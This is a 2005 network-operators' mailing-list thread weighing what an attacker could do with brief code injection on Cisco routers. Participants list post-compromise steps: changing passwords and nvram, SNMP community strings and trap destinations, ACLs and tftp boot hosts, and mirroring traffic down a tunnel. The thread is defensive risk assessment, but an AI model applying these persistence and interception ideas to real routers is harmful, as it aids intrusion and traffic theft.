RE: "Cisco gate" - Payload Versus Vector
very helpful analysis. some questions: even without stiffling the heap check via crashing_already (i.e. a 'fix' is developed for that weakness), is the 30-60 second window sufficient to do serious operational damage. i.e. what could an attacker do with a code injection with a mean life as short as 15-30 seconds? that seems a bit short for a direct routing injection of much worth. but how about a damping attack (flap the victim's route enough to cause everyone to damp them), or would mrai stiffle that? could it be used to cascade to a neighbor? i suppose that diverting the just the right 15-30 seconds of traffic could be profitable. secondly, is there reason not to believe that the attack vectors might be at layer two, mpls, as well as layer three, ip? i.e. the "internet-free core" gambit does not reduce exposure to this one?
The "bad guys" are discussing the issues and we should think long and hard before we muzzle the "good guys".
http://rip.psg.com/~randy/draft-ymbk-obscurity-00.txt is a bit old, but seems relevant. randy
On Tue, 2 Aug 2005, Randy Bush wrote:
even without stiffling the heap check via crashing_already (i.e. a 'fix' is developed for that weakness), is the 30-60 second window sufficient to do serious operational damage. i.e. what could an attacker do with a code injection with a mean life as short as 15-30 seconds?
change the passwords and write to nvram, and come back later? -Dan
On Tue, 2005-08-02 at 15:29 -0700, Dan Hollis wrote:
On Tue, 2 Aug 2005, Randy Bush wrote:
even without stiffling the heap check via crashing_already (i.e. a 'fix' is developed for that weakness), is the 30-60 second window sufficient to do serious operational damage. i.e. what could an attacker do with a code injection with a mean life as short as 15-30 seconds?
change the passwords and write to nvram, and come back later?
some more that come to mind as ssh/enable pw changes wouldn't go unnoticed for too long. change snmptrap dest change snmp r/w comstrs (most monitoring would only use r/o comstrs) change ACLs on snmp access to allow public IPs change the ip address of the host that is used for tftp boots lots of things can be done in a 1/10 of the 30-60 second window. -Jim P.
Randy Bush wrote:
very helpful analysis. some questions:
mrai stiffle that? could it be used to cascade to a neighbor? i suppose that diverting the just the right 15-30 seconds of traffic could be profitable.
More recent hardware allows you to take copies of packets and push them down an IP tunnel. Pushing something like this into the configuration would make much more sense. Pete
participants (4)
-
Dan Hollis
-
Jim Popovitch
-
Petri Helenius
-
Randy Bush